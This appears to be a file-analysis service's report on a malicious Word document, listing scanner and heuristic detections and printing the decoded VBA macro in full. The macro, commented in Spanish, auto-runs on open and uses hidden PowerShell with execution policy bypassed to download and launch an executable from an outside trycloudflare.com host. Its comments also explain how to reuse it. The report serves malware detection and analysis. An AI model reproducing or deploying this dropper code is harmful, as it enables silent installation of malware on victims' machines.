MALICIOUS
558
Risk Score
Heuristics 15
-
ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim shell As Object -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set shell = CreateObject("WScript.Shell") -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
command = "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command ""(New-Object System.Net.WebClient).DownloadFile('" & exeURL & "', '" & tempPath & "'); Start-Process '" & tempPath & "'""" -
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPERThe macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.Matched line in script
Sub AutoOpen() -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set shell = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
tempPath = Environ("TEMP") & "\XClient.exe" -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- https://developmental-round-owner-cage.trycloudflare.com/XClient.exeIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1781 bytes |
SHA-256: b49d10072889c0d1ca60db19f091723dc52982f456d44b11bae669872a933be7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Esta macro se ejecutará automáticamente al abrir el documento
Sub AutoOpen()
' Oculta cualquier posible error para no alertar al usuario
On Error Resume Next
' --- CONFIGURACIÓN ---
' CAMBIA ESTA LÍNEA por la URL directa de tu archivo ejecutable
Dim exeURL As String
exeURL = "https://developmental-round-owner-cage.trycloudflare.com/XClient.exe"
' --------------------
' Define una ruta temporal para guardar el archivo, usando un nombre poco sospechoso
Dim tempPath As String
tempPath = Environ("TEMP") & "\XClient.exe"
' Construye el comando de PowerShell para descargar y ejecutar el archivo en segundo plano
' -WindowStyle Hidden: Oculta la ventana de PowerShell
' -ExecutionPolicy Bypass: Ignora las políticas de ejecución de scripts de PowerShell
Dim command As String
command = "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command ""(New-Object System.Net.WebClient).DownloadFile('" & exeURL & "', '" & tempPath & "'); Start-Process '" & tempPath & "'"""
' Crea un objeto WScript.Shell para ejecutar el comando silenciosamente
Dim shell As Object
Set shell = CreateObject("WScript.Shell")
' Ejecuta el comando. El '0' significa que se ejecuta oculto.
shell.Run command, 0, False
' Limpia el objeto para no dejar rastros
Set shell = Nothing
End Sub
Attribute VB_Name = "NewMacros"
Sub macro()
'
' macro Macro
'
'
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.